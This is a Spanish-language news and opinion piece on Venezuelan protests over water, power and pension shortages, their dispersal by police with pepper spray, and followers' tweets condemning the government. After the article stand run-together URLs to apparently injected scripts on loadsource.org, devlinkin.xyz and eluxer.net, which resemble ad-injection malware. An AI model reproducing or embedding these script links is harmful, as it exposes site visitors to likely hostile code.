Eduardo Battistini @ebattistini: “El pueblo protesta por falta de agua y la PNB los reprime y se lleva detenidos a varios. ¿Será que a la casa de esos funcionarios nunca falta el agua?”

Los días 18 y 19 de julio se vivieron jornadas intensas de protestas en todo el territorio nacional, los abuelitos quejándose por no recibir el pago completo de su pensión, los trabajadores del Instituto Venezolano de Investigaciones Científicas (Ivic), los empleados de Cantv, trabajadores de Abasto Bicentenario en Valencia, enfermeras, trabajadores de la energía eléctrica, Docentes Alcaldía Sucre, jóvenes por transporte Chacao, Cañicultores en la Av. Urdaneta, Chacao por  falta de agua, todas estas manifestaciones son sinónimos de la grave crisis económica que padece actualmente el país.

No solamente pensionados y trabajadores públicos decidieron manifestar, también sectores populares tomaron las calles para trancarlas y exigir sus derechos a servicios básicos, las respuestas de los organismos policiales no se hizo esperar, represión y gas pimienta.

PNB y GNB dispersan protesta de habitantes de El Cementerio por falta de agua. Con gas pimienta los obligaron a levantar la tranca en la autopista. A las 8:39 pm fue cerrada la carretera panamericana (vía a Los Teques) a la altura del kilómetro 2 por habitantes de los barrios vecinos.  Protestan por falta de agua.

Vecinos de La Vega protestan porque tienen más de tres meses sin agua. Protestan en Santa Eduvigis por falta de agua. PNB reprimió con gases lacrimógenos protesta por falta de servicio eléctrico en Barcelona, Edo. Anzoátegui.

El derecho a la manifestación se encuentra en nuestra carta magna reflejado en su artículo 68 donde dicta: “Los ciudadanos y ciudadanas tienen derecho a manifestar, pacíficamente y sin armas, sin otros requisitos que los que establezca la ley. Se prohíbe el uso de armas de fuego y sustancias tóxicas en el control de manifestaciones pacíficas. La ley regulará la actuación de los cuerpos policiales y de seguridad en el control del orden público”.

Sin embargo queda demostrado una vez más como en reiteradas ocasiones el actual gobierno comunista viola la constitución de la República Bolivariana de Venezuela, no es de extrañar que el pueblo venezolano tema salir a manifestar por sus derechos ya que los cuerpos de seguridad que deberían protegernos, nos reprimen cruelmente, incluso llegando a quitarnos la vida. Venezuela se encuentra secuestrada.

En @ReporteYa seleccionamos algunas opiniones de nuestros destacados seguidores:

Nuestra seguidora, Iraida Durand @IraidaDurand redacta: “Si todas las protestas se unieran, el impacto sería mayor”.

El Consejal, Eduardo Battistini @ebattistini señala: “El pueblo protesta por falta de agua y la PNB los reprime y se lleva detenidos a varios. ¿Será que a la casa de esos funcionarios nunca falta el agua?”.

Nuestra seguidora, Daisy Rivas @RivasDaisy expresa: “Buenos ya sabemos los policías no se bañan, ni beben agua”.

La usuaria, Ivonne Mujica @ivonnebm70 indica: “Sigan protestando los servicios, de agua, luz, gas, gasolina son derechos y forman parte de DDHH, pues son vitales para tener calidad de vida”.

Nuestro seguidor, Gerardo David Denis @gdaviddenis comunica: “Epa @ErikaPSUV @NicolasMaduro ¿Tu PNB esta reprimiendo a los pobres de cerro por pedir agua?”.

La Docente, Sugeis del Valle @sugeisdelvalle comenta: “Mientras más daño le hagan a este pueblo, más rabia el pueblo les tendrá”.

La cuenta, @LaProfeU escribe: “Hasta que un día de estos ese gas pimienta no les va valer de nada (será perfume) y la furia del pueblo será tan grande que…”.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=17https://devlinkin.xyz/addons/lnkr5.min.jshttps://devlinkin.xyz/addons/lnkr30_nt.min.jshttps://eluxer.net/code?id=105&subid=51824_6748_

Loading...